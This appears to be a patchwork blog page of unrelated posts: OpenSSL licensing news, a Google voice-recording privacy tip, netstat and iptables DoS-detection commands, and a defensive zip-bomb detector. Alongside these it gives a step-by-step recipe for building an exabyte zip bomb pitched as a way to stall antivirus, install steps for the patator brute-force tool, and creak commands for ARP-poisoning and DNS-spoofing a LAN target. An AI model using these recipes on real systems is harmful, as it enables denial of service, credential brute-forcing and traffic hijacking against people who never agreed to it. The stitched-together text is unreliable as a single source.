The OpenSSL project has announced a change of license, from its Apache-like license to the Apache License 2.0, to make it easier to use OpenSSL in free-software projects and products. OpenSSL is the most widely used encryption library. It was previously dual-licensed under the OpenSSL License and the SSLeay License: the OpenSSL License is derived from the Apache License 1.0, and the SSLeay License is a 4-clause BSD license.

Neither of these licenses is compatible with the GPL, so GPL software has needed an exception in order to use OpenSSL, whereas the Apache License 2.0 is compatible with the GPL. After the license change, OpenSSL can be integrated into GPL software more freely. The OpenSSL project says that over the next few days it will begin sending mail to all project contributors asking them to approve the change.

Zip Bomb and how to make one

Posted: 19/03/2017 in Uncategorized

A zip bomb, also known as a decompression bomb (or the ‘Zip of Death’ for the overly dramatic ones), is a malicious archive file designed to crash or render useless the program trying to access it. It could also be employed to disable anti-virus software, in order to create an opening for other typical viruses. Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (for example, by an anti-virus in order to scan for viruses) requires inordinate amounts of time, disk space or memory (or all of these).

The classic zip bomb is a tiny zip archive file; most are measured in kilobytes. However, when this file is unzipped its contents are more than the system can handle. A typical zip bomb file can easily unpack into hundreds of gigabytes of garbage data, and more advanced ones can go up to petabytes (millions of gigabytes) or even exabytes (billions of gigabytes). Yes, to be perfectly clear, we are indeed talking about stuffing exabytes of data into kilobytes.

To understand how it works, we have to take a little detour to see how data compression works (WinZip, WinRAR, 7-zip etc.)

What is compression?

Compression is a reduction in the number of bits needed to represent data. Consider the following string:

aaabbbbaaabaaabaaa

The above string is 18 characters long. Notice that the substring aaa can be found a lot of times. This is what’s known as statistical redundancy. We take the longest common sequences in data and try to represent them using as few bits as possible. Now, compressing this string means we have to represent this information in less than 18 characters. Let’s replace every occurrence of ‘aaa’ with a symbol, say ‘$’ and see what happens. Instead of using the string directly, we use an intermediate (compressed) form of the string along with some instructions on how to get the original string:

$bbbb$b$b$

$=aaa

The first line is supposed to be our compressed data and the second line is the instruction, a dictionary that we’ve created which tells us that when we want to decompress the data we should replace every occurrence of $ with aaa to get back the original data. Now if you count the total number of characters, we only need 10 + 5 = 15 to represent the same information. Compression just happened.

Now this was a very crude example and our little ‘algorithm’ ignored a lot of things that a practical compression algorithm (such as Huffman coding or LZW) needs. But it’ll do for our purposes.

If you often use compression applications like WinZip or WinRar you’ll notice that sometimes your data compresses very well, while other times compression hardly reduces the size of the data. The real takeaway is that compression thrives when the data has some repeating patterns (i.e., statistical redundancy). As an example, when compressing text we can use the knowledge that the letter e is the most common letter in modern English. So, it’d be worth our while to try and represent e by as few bits as possible.

Now back to zip bombs.

42.zip

No discussion on zip bombs is complete without the infamous 42.zip. It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3 gigabyte (4.3×10^9 bytes) file for a total of 4.5 petabytes (4.5×10^15 bytes) of uncompressed data.

The 42.zip is just one example; there are many more like this and you can create your own. The principle of zip bombs extends to many other areas. A similar file is an XML-based decompression bomb called “billion laughs” (or XML Bomb). Basically it crashes a web browser by causing the XML parser to run out of memory. Most web browsers today defend against this by capping the memory allocated to the parser.

4.5 petabytes is pretty impressive, but what we’re about to do is going to blow this out of the water. We are going to build an exabyte zip bomb.

How to make a zip bomb

Let’s take a look at how to create your very own zip bomb. It’s pretty easy.

  • Open up a text editor.
  • Start typing zeros (0). A lot of zeros. Really, just keep the button pressed. And then some more.
  • Now select the whole thing and copy and paste. And paste. And paste.
  • Rinse and repeat. You need to do the above until your text file has literally millions of zeroes. Your innocent text editor will likely begin to lag around a hundred thousand zeros, so be careful and keep going.

[Image: Notepad with thousands of zeros. Caption: Who told you to stop? Keep pasting!]

  • P.S: There’s an easier shortcut. Say you make an initial text file around 10MB worth of zeros. Save it and close your text editor. Go to the folder where your text file is stored and make around ten copies of the text file in the same folder. Now open up a command prompt where your text file is stored and type:

    copy /b *.txt combined.txt

    What this does is combine all the copies of the text files into one. Better still, it can do this quickly without any lag. Text editors freeze up because of having to deal with the user interface. Using the command line, everything happens as a background process without a hiccup. Combining ten files of 10MB will yield one 100MB file; combine ten copies of that and you have a 1GB text file full of zeros in just a few seconds.

In a standard text file, every character needs 1 byte (8 bits) of storage. So,

  • One thousand characters = 1,000 bytes (just under one kilobyte. Remember a kilobyte is 1024 bytes not 1000)
  • One million characters = 1,000,000 bytes (just under one megabyte)
  • One billion characters = 1,000,000,000 bytes (just shy of one gigabyte)

The exact size doesn’t really matter. A 1GB text file will do just fine.

  • Now, open up your compression app (any will work, WinZip, WinRar, 7-zip etc.) and compress the text file.
  • Hold on to your dropping jaw, as you’ll likely see a compression rate of around 99.9% (a 1000 times reduction in file size); the 1 GB file would be around 1 MB compressed.
  • Now some final bit of copy-pasting is left. Make a dozen or so copies of the zip file. Now zip them.
  • Make a few copies of this new zip file and zip all the copies.
  • Keep adding more and more layers and voilà! Our zip bomb is ready. At 9 layers (each with 10 zipped files of the layer below), with a 1GB text file at the bottom, you’d have a total of 1 exabyte (= 10^9 × 1GB = 10^18 bytes) and the zip bomb would be a few kilobytes.

And there we go.

How is a zip bomb used?

So now that we have packed a ridiculous amount of data into one tiny file, what can be done with it? Is it just a quirky trick, interesting but useless? Yes and no.

Old compression applications used to come with a “feature” called recursive decompression. You could choose to fully unpack an archive that you knew had more archives within it. The zip bomb was actually a bomb for these applications. Even today, most common storage devices (like the hard disk in your computer) are pretty slow. So, it would take a good long while to write a large amount of data to the storage device. Anyone slowly unpacking a zip bomb would quickly notice this and simply stop the process, defusing our bomb. Most modern applications don’t use recursive decompression because of zip bombs.

In the same vein, most modern anti-virus programs can detect whether a file is a zip bomb and avoid unpacking it. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level – effectively converting their exponential growth to linear. And so the bomb is defused yet again.

If this weren’t the case, then zip bombs would still be a viable attack against anti-viruses, or at the very least a stalling technique. It’s pretty straightforward. A malicious hacker’s holy grail is to be able to run an executable file on the victim’s computer without the prying eyes of anti-viruses. Anti-viruses keep a close watch on new, potentially dangerous files. So to execute a potentially dangerous file, why not distract the anti-virus with something else? This is exactly what a zip bomb could do in earlier times. While the anti-virus is choking, a malicious executable could easily steal data, install backdoors or bitcoin miners or really just anything, and even whitelist these installations in the anti-virus, completely owning the system.

But this technique is no longer viable. This is both good for us (as users) and bad for us (as hackers). But security is a race without a finish line. You can’t ever be sure that a system is completely secure. Even if you do find the very last security hole in a system, you’ll never be able to know that it was indeed the last security hole. All we can do is keep on looking and that leaves open the possibility that perhaps one day a new vulnerability would be found and zip bombs would come back with a bang.
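As an added example (not code from the post), here is a small Python inspector that applies the defence described above: it reads the declared sizes from the zip central directory without inflating any payload, follows nested archives only to a bounded depth, and, because a bomb is built from identical copies, inspects each distinct nested archive once and reuses the result (the “one file followed per level” trick). The helpers build_sample and build_benign are constructed toy-scale inputs for trying it out; the thresholds are assumptions you would tune for your scanner.

```python
import io
import os
import zipfile

MAX_DEPTH = 5               # stop descending into nested archives beyond this (assumed limit)
MAX_NESTED_READ = 1 << 20   # never unpack a nested archive member above 1 MiB (assumed limit)
RATIO_ALERT = 100           # declared size / archive size above this is suspicious (assumed)

def declared_expansion(archive_bytes, depth=0, _seen=None):
    """Total uncompressed size the archive *claims* it expands to, taken from
    the central directory without decompressing any leaf payload. Nested .zip
    members are inspected recursively, but an archive already seen (same CRC
    and size) is inspected once and its result reused, so a bomb built from
    identical copies costs linear rather than exponential work."""
    if _seen is None:
        _seen = {}
    total = 0
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            nested = info.filename.lower().endswith(".zip")
            if nested and depth < MAX_DEPTH and info.file_size <= MAX_NESTED_READ:
                key = (info.CRC, info.file_size)
                if key not in _seen:
                    # ZipFile.read() stops at the declared size, so this read is bounded
                    _seen[key] = declared_expansion(zf.read(info), depth + 1, _seen)
                total += _seen[key]
            else:
                total += info.file_size   # header value only; nothing is inflated
    return total

def is_suspicious(archive_bytes):
    """(flag, declared_bytes, ratio) for an archive held in memory."""
    declared = declared_expansion(archive_bytes)
    ratio = declared / max(len(archive_bytes), 1)
    return ratio > RATIO_ALERT, declared, ratio

def build_sample(payload_size=1 << 20, copies=4, layers=2):
    """Constructed test input mirroring the recipe above at toy scale:
    a zero-filled file zipped, then `copies` copies of that archive zipped
    again `layers` times. 1 MiB at the bottom keeps it harmless."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("zeros.txt", b"0" * payload_size)
    data = buf.getvalue()
    for layer in range(layers):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            for i in range(copies):
                zf.writestr(f"layer{layer}_{i}.zip", data)
        data = buf.getvalue()
    return data

def build_benign(size=20000):
    """Constructed control: incompressible random bytes, ratio close to 1."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("random.bin", os.urandom(size))
    return buf.getvalue()
```

The sample declares 4 × 4 × 1 MiB = 16 MiB while the archive itself is only a few tens of kilobytes, so it trips the ratio check; the random control does not.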

 

What is patator?
It is a multi-purpose brute-force tool with a decent number of modules on board and fairly flexible settings. Patator is, as usual, a Python script, operated from the command line.

Currently it supports the following modules:

* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz : Brute-force HTTP/HTTPS
* ajp_fuzz : Brute-force AJP
* pop_login : Brute-force POP
* pop_passd : Brute-force poppassd (not POP3)
* imap_login : Brute-force IMAP
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* rlogin_login : Brute-force rlogin
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* mysql_query : Brute-force MySQL queries
* rdp_login : Brute-force RDP (NLA)
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Brute-force DNS
* dns_reverse : Brute-force DNS (reverse lookup subnets)
* ike_enum : Enumerate IKE transforms
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
* umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes

Download

root@ddos:~/Desktop# git clone https://github.com/lanjelot/patator.git

root@ddos:~/Desktop# cd patator/

root@ddos:~/Desktop/patator# python patator.py

Your server appearing pretty slow could be many things, from wrong configs, scripts and dodgy hardware, but sometimes it could be because someone is flooding your server with traffic, known as DoS (Denial of Service) or DDoS (Distributed Denial of Service).

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. This attack generally targets sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. DoS attacks are implemented either by forcing the targeted computer to reset, by consuming its resources so that it can no longer provide its services, or by obstructing the communication media between the users and the victim so that they can no longer communicate adequately.

In this small article you’ll see how to check if your server is under attack from the Linux terminal with the netstat command.

From the man page of netstat “netstat – Print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships”

Some examples with explanation

netstat -na
This displays all active Internet connections to the server, and only established connections are included.

netstat -an | grep :80 | sort
Show only active Internet connections to the server on port 80 (the HTTP port, so it’s useful if you have a web server) and sort the results. Useful in detecting a single flood by allowing you to recognize many connections coming from one IP.

netstat -n -p | grep SYN_REC | wc -l
This command is useful to find out how many active SYN_REC connections are occurring on the server. The number should be pretty low, preferably less than 5. During DoS attack incidents or mail bombs, the number can jump pretty high. However, the value always depends on the system, so a high value may be average on another server.

netstat -n -p | grep SYN_REC | sort -u
List all the IP addresses involved instead of just the count.

netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'
List all the unique IP addresses of the nodes that are sending SYN_REC connection status.

netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
Use the netstat command to calculate and count the number of connections each IP address makes to the server.

netstat -anp | grep -E 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
List the number of connections each IP has to the server using the TCP or UDP protocol (grep -E is needed so that | acts as alternation rather than a literal character).

netstat -ntu | grep ESTAB | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr
Check on ESTABLISHED connections instead of all connections, and display the connection count for each IP.

netstat -plan | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nk 1
Show and list each IP address and its connection count for connections to port 80 on the server. Port 80 is used mainly by HTTP web page requests.

How to mitigate a DOS attack

Once that you have found the IP that are attacking your server you can use the following commands to block their connection to your server:

iptables -I INPUT 1 -s $IPADDRESS -j DROP
Please note that you have to replace $IPADDRESS with the IP address that you found with netstat. The rule is inserted (-I) at position 1 so it is evaluated before any existing rules; use -j REJECT instead of -j DROP if you prefer the sender to receive an error rather than silence.
After firing the above command, kill all httpd connections to clean your system and then restart the httpd service
using the following commands:

killall -KILL httpd

service httpd start          # for Red Hat systems
/etc/init.d/apache2 restart  # for Debian systems
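The netstat pipelines above and the blocking step, put together as an added Python example (not code from the article): it parses netstat -ntu output, counts connections per remote IP (optionally per state), flags addresses over a threshold, and emits the iptables rules for review rather than running them. The netstat output below is a constructed sample, not a capture from a real host; the port is stripped with rsplit so IPv6 addresses survive, which the cut -d: -f1 one-liner does not handle.

```python
from collections import Counter

# Constructed sample of `netstat -ntu` output (not captured from a real host):
# 203.0.113.9 holds four half-open (SYN_RECV) connections to port 80.
SAMPLE_NETSTAT = """
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.0.0.5:80             203.0.113.9:51001       SYN_RECV
tcp        0      0 10.0.0.5:80             203.0.113.9:51002       SYN_RECV
tcp        0      0 10.0.0.5:80             203.0.113.9:51003       SYN_RECV
tcp        0      0 10.0.0.5:80             203.0.113.9:51004       SYN_RECV
tcp        0      0 10.0.0.5:22             198.51.100.4:40122      ESTABLISHED
tcp        0      0 10.0.0.5:80             198.51.100.7:33210      ESTABLISHED
tcp        0      0 10.0.0.5:80             198.51.100.7:33211      TIME_WAIT
udp        0      0 10.0.0.5:53             198.51.100.4:5353       ESTABLISHED
tcp6       0      0 2001:db8::5:80          2001:db8::10:44000      ESTABLISHED
"""

def parse_netstat(text):
    """Return (proto, local, remote_ip, state) tuples for each connection line.
    The two header lines and unconnected UDP sockets (no state column) are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] not in ("tcp", "tcp6", "udp", "udp6"):
            continue
        remote_ip = parts[4].rsplit(":", 1)[0]   # strip the port; safe for IPv6 too
        rows.append((parts[0], parts[3], remote_ip, parts[5]))
    return rows

def count_by_ip(text, state=None):
    """Connections per remote IP, optionally restricted to one state; the
    equivalent of the awk | cut | sort | uniq -c pipelines in the article."""
    return Counter(ip for _, _, ip, st in parse_netstat(text)
                   if state is None or st == state)

def suspects(text, state, threshold):
    """Remote IPs with more than `threshold` connections in the given state."""
    return sorted(ip for ip, n in count_by_ip(text, state).items() if n > threshold)

def block_rules(ips):
    """iptables commands inserting a DROP rule at position 1 for each IP.
    They are returned as strings for a human to review, never executed here."""
    return [f"iptables -I INPUT 1 -s {ip} -j DROP" for ip in ips]

if __name__ == "__main__":
    flagged = suspects(SAMPLE_NETSTAT, "SYN_RECV", 3)
    print("\n".join(block_rules(flagged)))
```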

 


According to The Independent, Google’s voice search function doesn’t just turn on when you ask it to. Rather, it records almost everything.

Feeling unnerved yet? Well, it gets even wilder. You see, you can listen to the recordings Google has stored and associated with your name simply by visiting this webpage.

There’s also this webpage that will show you how much Google knows about your every move on the internet.

Both webpages will contain information from not only computers but any Android device you’ve logged in to your Google account.

How to Delete the Recordings

Luckily, if you’re not too happy about Google having potentially hours of your voice in its database, you can delete those files.

Beside each file’s title you’ll see a checkbox.

Just select the three dots top right and select delete.

How to Stop Google from Recording You Again

Now, as The Independent points out, stopping Google from recording you does result in some limited functionality if you’re using an Android phone or the company’s search.

However, you may be someone whose concern for privacy is much greater than finding what you’re looking for easily. If so, begin by never using Google’s voice search functions again. Follow up by disabling Google’s voice search.

  1. Navigate to Settings
  2. Tap the General tab
  3. Under “Personal” find “Language & keyboard”
  4. Find “Google voice typing” and tap the Settings button
  5. Tap “Ok Google” Detection
  6. Under the “From the Google app” option, move the slider to the left. If Google voice is already enabled move the slider to the left of “From any screen” or “Trusted Voice” and the “From the Google app” will appear.

 

Recently I was asked how to deny navigation and download capabilities of compromised machines on the local network. Well, this script by codepr performs an ARP poison attack and sends TCP reset packets in response to every request made to the router.

Installation

$ git clone https://github.com/coldcain/creak.git
$ cd creak
$ python setup.py install

or simply clone the repository and run the creak.py after all requirements are installed:

$ git clone https://github.com/codepr/creak.git

It requires the pcap libraries for raw packet manipulation and the dpkt module; the DNS spoofing options additionally require the dnet module from the libdnet package (do not confuse it with the pydnet network evaluation tool). It can also use scapy if desired; this can be set in the config.py file.

Options

Usage: creak.py [options] dev

Options:
  -h, --help           show this help message and exit
  -1, --sessions-scan  Sessions scan mode
  -2, --dns-spoof      Dns spoofing
  -x, --spoof          Spoof mode, generate a fake MAC address to be used
                       during attack
  -m MACADDR           Mac address octet prefix (could be an entire MAC
                       address in the form AA:BB:CC:DD:EE:FF)
  -M MANUFACTURER      Manufacturer of the wireless device, for retrieving a
                       manufactur based prefix for MAC spoof
  -s SOURCE            Source ip address (e.g. a class C address like
                       192.168.1.150) usually the router address
  -t TARGET            Target ip address (e.g. a class C address like
                       192.168.1.150)
  -p PORT              Target port to shutdown
  -a HOST              Target host that will be redirect while navigating on
                       target machine
  -r REDIR             Target redirection that will be fetched instead of host
                       on the target machine
  -v, --verbose        Verbose output mode
  -d, --dotted         Dotted output mode

Example

Most basic usage: Deny all traffic to the target host

$ python creak.py -t 192.168.1.50 wlan0

Set a different gateway:

$ python creak.py -s 192.168.1.2 -t 192.168.1.50 wlan0

Set a different mac address for the device:

$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.50 wlan0

Spoof mac address generating a fake one:

$ python creak.py -x -t 192.168.1.50 wlan0

Spoof mac address, generating one based on the manufacturer (e.g. Xeros):

$ python creak.py -x -M xeros -t 192.168.1.50 wlan0

DNS spoofing using a fake MAC address, redirecting ab.xy to cd.xz (e.g. localhost):

$ python creak.py -x -M xeros -t 192.168.1.50 -a www.ab.xy -r www.cd.xz wlan0